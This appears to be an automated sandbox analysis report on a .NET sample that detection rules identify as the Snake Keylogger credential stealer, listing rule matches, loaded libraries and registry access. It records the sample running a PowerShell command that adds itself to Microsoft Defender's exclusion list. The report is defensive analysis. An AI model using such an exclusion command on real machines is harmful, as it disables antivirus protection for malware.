Source: 2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 2Lzx7LMDWV.exe
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 2Lzx7LMDWV.exe
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1719218779.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 2Lzx7LMDWV.exe
Source: 2Lzx7LMDWV.exe, 00000000.00000000.1688350315.0000000000278000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRYKQ.exe. vs 2Lzx7LMDWV.exe
Source: 2Lzx7LMDWV.exe, 00000000.00000002.1724422245.0000000006D00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 2Lzx7LMDWV.exe
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4144207729.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 2Lzx7LMDWV.exe
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 2Lzx7LMDWV.exe
Source: 2Lzx7LMDWV.exe, 00000004.00000002.4143903238.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 2Lzx7LMDWV.exe
Source: 2Lzx7LMDWV.exe	Binary or memory string: OriginalFilenameRYKQ.exe. vs 2Lzx7LMDWV.exe

Source: 2Lzx7LMDWV.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.2Lzx7LMDWV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.2Lzx7LMDWV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.2Lzx7LMDWV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7620, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 2Lzx7LMDWV.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, worj6AsQG0OlAGbUlY.cs	Security API names: _0020.SetAccessControl
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, worj6AsQG0OlAGbUlY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, worj6AsQG0OlAGbUlY.cs	Security API names: _0020.AddAccessRule
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, worj6AsQG0OlAGbUlY.cs	Security API names: _0020.SetAccessControl
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, worj6AsQG0OlAGbUlY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, worj6AsQG0OlAGbUlY.cs	Security API names: _0020.AddAccessRule
Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, Vb64uVH5tiNGkhXK8B.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, worj6AsQG0OlAGbUlY.cs	Security API names: _0020.SetAccessControl
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, worj6AsQG0OlAGbUlY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, worj6AsQG0OlAGbUlY.cs	Security API names: _0020.AddAccessRule
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, Vb64uVH5tiNGkhXK8B.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, Vb64uVH5tiNGkhXK8B.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/6@6/4

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2Lzx7LMDWV.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xd32leeb.h0h.ps1

Jump to behavior

Source: 2Lzx7LMDWV.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 2Lzx7LMDWV.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2Lzx7LMDWV.exe	ReversingLabs: Detection: 31%
Source: 2Lzx7LMDWV.exe	Virustotal: Detection: 29%

Source: unknown	Process created: C:\Users\user\Desktop\2Lzx7LMDWV.exe "C:\Users\user\Desktop\2Lzx7LMDWV.exe"
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process created: C:\Users\user\Desktop\2Lzx7LMDWV.exe "C:\Users\user\Desktop\2Lzx7LMDWV.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe"	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Process created: C:\Users\user\Desktop\2Lzx7LMDWV.exe "C:\Users\user\Desktop\2Lzx7LMDWV.exe"	Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 2Lzx7LMDWV.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 2Lzx7LMDWV.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, worj6AsQG0OlAGbUlY.cs	.Net Code: fprs1MG7YS System.Reflection.Assembly.Load(byte[])
Source: 0.2.2Lzx7LMDWV.exe.6d00000.4.raw.unpack, worj6AsQG0OlAGbUlY.cs	.Net Code: fprs1MG7YS System.Reflection.Assembly.Load(byte[])
Source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, worj6AsQG0OlAGbUlY.cs	.Net Code: fprs1MG7YS System.Reflection.Assembly.Load(byte[])
